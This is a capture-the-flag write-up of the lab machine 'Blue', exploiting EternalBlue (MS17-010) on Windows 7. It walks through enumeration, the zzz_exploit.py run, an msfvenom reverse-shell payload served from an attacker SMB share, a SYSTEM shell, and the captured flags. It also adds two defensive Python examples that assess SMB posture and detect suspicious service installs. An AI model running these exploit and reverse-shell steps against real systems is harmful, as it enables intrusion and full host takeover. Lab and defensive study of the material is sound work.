Blue
7 minute read
- OS: Windows
- Difficulty: Easy
- IP address: 10.10.10.40
- Date: 28 / 07 / 2017
Port scan
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.40 -p 135,139,445,49152,49153,49154,49155,49156,49157
Nmap scan report for 10.10.10.40
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date:
|_ start_date:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.62 seconds
The machine has ports 135 (MS-RPC), 139 and 445 (SMB) open, among others.
$ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Enumeration
Looking at the SMB version (SMBv1) with signing disabled, we find that we can carry out the attack known as EternalBlue (CVE-2017-0144). The machine's name (Blue) is also a hint.
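Before moving on, it is worth turning the evidence collected so far into something a defender can act on. The following Python is an added example, not part of this writeup or of any tool it uses: it parses the nmap smb-security-mode/smb2-security-mode host-script block and the crackmapexec banner reproduced above (embedded as constructed sample input) and reports the weaknesses that make this host a candidate for the attack: SMBv1 enabled, signing not required, and an end-of-life Windows 7 host. The finding codes and messages are this example's own.

```python
import re

# Constructed sample input: the nmap host-script block and the crackmapexec
# banner from the scan above, embedded so the example runs offline.
NMAP_HOST_SCRIPTS = """\
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
"""

CME_BANNER = (
    "SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 "
    "(name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)"
)


def parse_nmap_smb_security(text):
    """Pull the signing state out of nmap's smb-security-mode / smb2-security-mode output."""
    result = {}
    m = re.search(r"message_signing:\s*(\w+)", text)
    if m:
        # SMB1 values nmap reports: disabled, supported, required
        result["smb1_signing"] = m.group(1)
    m = re.search(r"Message signing (enabled and required|enabled but not required|disabled)", text)
    if m:
        result["smb2_signing"] = m.group(1)
    return result


def parse_cme_banner(line):
    """Parse the crackmapexec smb banner into IP, OS string and the (key:value) flags."""
    flags = dict(re.findall(r"\((\w+):([^)]*)\)", line))
    os_match = re.search(r"\[\*\]\s+(.*?)\s+\(name:", line)
    return {
        "ip": line.split()[1],
        "os": os_match.group(1) if os_match else "",
        "smbv1": flags.get("SMBv1") == "True",
        "signing_required": flags.get("signing") == "True",
    }


def assess_smb_posture(nmap_text, cme_line):
    """Return a list of (code, message) findings a defender would act on."""
    nmap = parse_nmap_smb_security(nmap_text)
    cme = parse_cme_banner(cme_line)
    findings = []
    if cme["smbv1"]:
        findings.append(("SMBV1_ENABLED",
                         "SMBv1 is enabled: this is the attack surface for MS17-010 (EternalBlue); "
                         "disable the SMBv1 server"))
    if (not cme["signing_required"]
            or nmap.get("smb1_signing") == "disabled"
            or nmap.get("smb2_signing") == "enabled but not required"):
        findings.append(("SIGNING_NOT_REQUIRED",
                         "SMB signing is not required: sessions can be relayed or tampered with; "
                         "enforce 'require signing' on the server"))
    if "Windows 7" in cme["os"]:
        findings.append(("OS_WINDOWS7",
                         "Windows 7 host: confirm the MS17-010 update is installed; "
                         "Windows 7 is past end of support"))
    return findings


if __name__ == "__main__":
    for code, message in assess_smb_posture(NMAP_HOST_SCRIPTS, CME_BANNER):
        print("[{}] {}".format(code, message))
```

Run against the scan above, the three findings are exactly the ones that make the rest of this writeup possible; on a patched host with SMBv1 disabled and signing required the list is empty.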
We can list some SMB shares with a null session:
$ smbclient -L 10.10.10.40 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We are going to launch the EternalBlue attack with MS17-010. For that we need Python 2.7; the easiest way is a Docker container:
$ docker run -v "$(pwd):/opt" -it python:2.7 bash
root@2955c01b9358:/# cd /opt
root@2955c01b9358:/opt# cd MS17-010/
root@2955c01b9358:/opt/MS17-010# ls -la
total 204
drwxr-xr-x 22 root root 704 Jul 15 13:26 .
drwxr-xr-x 3 root root 96 Jul 15 13:26 ..
drwxr-xr-x 12 root root 384 Jul 15 13:26 .git
-rw-r--r-- 1 root root 27786 Jul 15 13:26 BUG.txt
-rw-r--r-- 1 root root 3367 Jul 15 13:26 README.md
-rw-r--r-- 1 root root 2495 Jul 15 13:26 checker.py
-rw-r--r-- 1 root root 25722 Jul 15 13:26 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24079 Jul 15 13:26 eternalblue_exploit8.py
-rw-r--r-- 1 root root 3804 Jul 15 13:26 eternalblue_poc.py
-rw-r--r-- 1 root root 1544 Jul 15 13:26 eternalchampion_leak.py
-rw-r--r-- 1 root root 2591 Jul 15 13:26 eternalchampion_poc.py
-rw-r--r-- 1 root root 5936 Jul 15 13:26 eternalchampion_poc2.py
-rw-r--r-- 1 root root 1651 Jul 15 13:26 eternalromance_leak.py
-rw-r--r-- 1 root root 948 Jul 15 13:26 eternalromance_poc.py
-rw-r--r-- 1 root root 5107 Jul 15 13:26 eternalromance_poc2.py
-rw-r--r-- 1 root root 1865 Jul 15 13:26 eternalsynergy_leak.py
-rw-r--r-- 1 root root 3022 Jul 15 13:26 eternalsynergy_poc.py
-rw-r--r-- 1 root root 1110 Jul 15 13:26 infoleak_uninit.py
-rw-r--r-- 1 root root 16669 Jul 15 13:26 mysmb.py
-rw-r--r-- 1 root root 1846 Jul 15 13:26 npp_control.py
drwxr-xr-x 5 root root 160 Jul 15 13:26 shellcode
-rw-r--r-- 1 root root 43417 Jul 15 13:26 zzz_exploit.py
We need to install impacket (pip install impacket). Then we can check that the machine is vulnerable with checker.py:
root@2955c01b9358:/opt/MS17-010# python checker.py
checker.py <ip>
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
It does not look vulnerable. But let's set guest as the username (we need to edit the script):
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Great, much better.
SMB exploitation
At this point we can use zzz_exploit.py to compromise the machine (we have to set guest as the username again):
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py
zzz_exploit.py <ip> [pipe_name]
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008391048
InParam: 0xfffff8a00870115c
MID: 0x802
unexpected alignment, diff: 0x-370fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008635048
InParam: 0xfffff8a00872a15c
MID: 0x807
unexpected alignment, diff: 0x-f5fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087a5088
InParam: 0xfffff8a00873e15c
MID: 0x903
unexpected alignment, diff: 0x66088
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087b3088
InParam: 0xfffff8a0087ad15c
MID: 0x903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done
Perfect, it worked. But it only created a file C:\pwned.txt. To get remote command execution (RCE), we can expose a malicious binary through an SMB server and run it:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o pwn.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe
Now we have to modify the exploit slightly. Specifically, this function has to end up like this:
def service_exec(a, v):
    pass

def smb_pwn(conn, arch):
    #smbConn = conn.get_smbconnection()
    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    service_exec(conn, r'cmd /c \\10.10.17.44\smbFolder\pwn.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
Then we start the SMB server with smbserver.py (Impacket) and run the exploit. If it does not work, we can try one of the pipes listed by checker.py (samr, lsarpc, browser…):
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0080cc048
InParam: 0xfffff8a00872a15c
MID: 0x3803
unexpected alignment, diff: 0x-65efb8
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087b2088
InParam: 0xfffff8a0087a515c
MID: 0x3903
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087d2088
InParam: 0xfffff8a0087cc15c
MID: 0x3903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service zVPI.....
Starting service zVPI.....
The NETBIOS connection with the remote host timed out.
Removing service zVPI.....
ServiceExec Error on: 10.10.10.40
Unexpected answer from server: Got 46, Expected 47
Done
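The output above also shows the footprint this step leaves on the target: a service with a short random name (zVPI) whose command is a UNC path to a share on the attacker's host, created and removed within seconds. The following Python is an added detection example, not part of the writeup or of the MS17-010 repository. The log records are constructed in a simplified key=value form modelled on Windows System log Event ID 7045 (a service was installed in the system); the rules (four-letter name, UNC path, cmd /c wrapper) and the record layout are this example's assumptions, and a real deployment would feed it the equivalent fields from the event log or a SIEM.

```python
import re

# Constructed sample records, flattened to key=value pairs in the shape of
# Windows System log Event ID 7045 ("A service was installed in the system").
# The second record mirrors the service_exec step shown above: a four-letter
# random service name whose command runs a binary from a remote share.
SAMPLE_EVENTS = [
    'EventID=7045 Host=HARIS-PC ServiceName="Mozilla Maintenance Service" '
    'ImagePath="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" '
    'ServiceType="user mode service" StartType="demand start" Account=LocalSystem',
    'EventID=7045 Host=HARIS-PC ServiceName=zVPI '
    'ImagePath="cmd /c \\\\10.10.17.44\\smbFolder\\pwn.exe" '
    'ServiceType="user mode service" StartType="demand start" Account=LocalSystem',
    # A later state-change event for the same service: not an install, so ignored.
    'EventID=7036 Host=HARIS-PC ServiceName=zVPI State=stopped',
]

# key=value where the value is either "quoted with spaces" or a bare token
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Each rule: (name, predicate over the parsed event, human-readable reason)
RULES = [
    ("random_short_name",
     lambda e: re.fullmatch(r"[A-Za-z]{4}", e.get("ServiceName", "")) is not None,
     "four-letter service name, the random naming seen in the service_exec output"),
    ("remote_unc_binary",
     lambda e: re.search(r"\\\\[\w.-]+\\", e.get("ImagePath", "")) is not None,
     "service command points at a UNC path on another host"),
    ("shell_wrapper",
     lambda e: re.match(r"(?i)\s*(cmd(\.exe)?|%comspec%)\s+/[ck]\b", e.get("ImagePath", "")) is not None,
     "service command is a cmd /c wrapper rather than a service binary"),
]


def parse_event(line):
    """Split a flattened key=value record into a dict, honouring quoted values."""
    fields = {}
    for key, quoted, bare in FIELD_RE.findall(line):
        fields[key] = bare if bare else quoted
    return fields


def detect_suspicious_service_installs(lines):
    """Return one finding per Event ID 7045 record that trips at least one rule."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "7045":
            continue
        reasons = [why for _, test, why in RULES if test(event)]
        if reasons:
            findings.append({
                "host": event.get("Host", ""),
                "service": event.get("ServiceName", ""),
                "image_path": event.get("ImagePath", ""),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for hit in detect_suspicious_service_installs(SAMPLE_EVENTS):
        print("{host}: service {service!r} -> {image_path}".format(**hit))
        for reason in hit["reasons"]:
            print("    - " + reason)
```

The legitimate installer record passes all three rules, while the zVPI record trips every one of them. Any single rule fires on its own, so a service whose command is a UNC path with a long, plausible name is still reported; the point of combining them is that the install event survives even when the service itself is removed moments later, as it is above.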
We receive a connection on the SMB server:
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.40,49197)
[*] AUTHENTICATE_MESSAGE (\,HARIS-PC)
[*] User HARIS-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
And the pwn.exe binary runs and we get a shell as nt authority\system:
$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49198.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
At this point we can read both flags, user.txt and root.txt:
C:\Windows\system32>dir C:\Users
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,691,747,840 bytes free
C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
bb50fc9a421df6dc53a95fd7a5c4bfe6
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
fd999003d610c8fe77d56868651ba5d3